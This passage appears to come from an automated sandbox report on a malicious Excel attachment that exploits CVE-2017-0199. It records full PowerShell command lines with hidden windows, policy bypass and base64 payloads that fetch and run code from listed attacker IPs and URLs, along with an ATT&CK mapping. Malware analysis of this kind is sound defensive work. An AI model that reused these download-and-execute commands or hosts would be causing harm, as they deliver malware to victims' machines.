c2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	121 Command and Scripting Interpreter	121 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Euro confirmation Sp.xls	24%	ReversingLabs	Document-Excel.Exploit.CVE-2017-0199
Euro confirmation Sp.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\~DF634BD35CC9B94982.TMP	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...s	0%	Avira URL Cloud	safe
https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=gr	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/	0%	Avira URL Cloud	safe
https://jktc.pro/:	0%	Avira URL Cloud	safe
https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea	0%	Avira URL Cloud	safe
http://crl.usertru	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...un	0%	Avira URL Cloud	safe
http://23.95.235.29/o	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...	0%	Avira URL Cloud	safe
https://jktc.pro/5	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gre	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF	0%	Avira URL Cloud	safe
https://jktc.pro/	0%	Avira URL Cloud	safe
http://23.95.235.29/90/veryniceb	0%	Avira URL Cloud	safe
http://23.95.235.29/	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFp	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFY	0%	Avira URL Cloud	safe
https://jktc.pro/1.a2M	0%	Avira URL Cloud	safe
http://go.cr	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:	0%	Avira URL Cloud	safe
http://23.95.235.29/L9a2M	0%	Avira URL Cloud	safe
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll	0%	Avira URL Cloud	safe
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&t	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	188.114.96.6	true	false	high
cloudinary.map.fastly.net	151.101.1.137	true	false	high
jktc.pro	104.21.34.183	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF	true	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	true	Avira URL Cloud: safe	unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/	mshta.exe, 00000004.00000003.436483754.0000000002575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482272011.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.486809620.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/o	mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX	powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...	mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=gr	mshta.exe, 0000000F.00000002.488436254.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Euro confirmation Sp.xls, ~DF634BD35CC9B94982.TMP.0.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...un	mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...s	mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
